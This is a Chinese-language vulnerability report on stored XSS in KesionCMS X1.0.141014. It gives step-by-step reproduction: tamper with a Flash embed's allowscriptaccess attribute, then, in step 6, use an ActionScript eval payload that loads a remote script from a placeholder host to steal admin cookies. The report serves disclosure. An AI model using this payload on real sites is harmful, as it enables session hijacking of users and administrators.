### 简要描述:
KesionCMS存在存储型跨站,触发概率很大,可打管理员。
### 详细说明:
KesionCMS X1.0.141014存在存储型跨站,利用此漏洞,我们可以攻击任意用户和管理员,获取任意用户和管理员cookie信息,或进行其它恶意攻击。
### 漏洞证明:
1、登录系统--》会员中心--》文章--》发布,在文章内容处插入flash文件。
[<img src="https://images.seebug.org/upload/201411/23151835c3bde7b5c12d00ab607a4637b38f11d1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23151835c3bde7b5c12d00ab607a4637b38f11d1.png)
2、发布文章时,拦截请求,将allowscriptaccess的属性值改为always
[<img src="https://images.seebug.org/upload/201411/23151924bce39a93c91e4738573036c11dc71656.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23151924bce39a93c91e4738573036c11dc71656.png)
3、其它用户浏览发布的文章时,漏洞触发:
[<img src="https://images.seebug.org/upload/201411/23152019fb201ebbf44f06993c91147d90761cbb.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23152019fb201ebbf44f06993c91147d90761cbb.png)
4、使用Firebug查看页面源代码,允许执行swf文件内的as代码:
[<img src="https://images.seebug.org/upload/201411/231522218c6a987afdda3707831a30108008a613.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231522218c6a987afdda3707831a30108008a613.png)
5、后台管理员登陆系统,点击文章标题,查看文章,漏洞触发:
[<img src="https://images.seebug.org/upload/201411/23152305ed193791af9f6f8e967705870082daa9.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23152305ed193791af9f6f8e967705870082daa9.png)
6、修改as代码为:import flash.external.ExternalInterface;
ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);");/
漏洞触发时,成功加载本地脚本:
[<img src="https://images.seebug.org/upload/201411/231524174f4687c583f6dd5932be55283c4f8ab7.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231524174f4687c583f6dd5932be55283c4f8ab7.png)
修改本地脚本内容,进行针对性的攻击。
暂无评论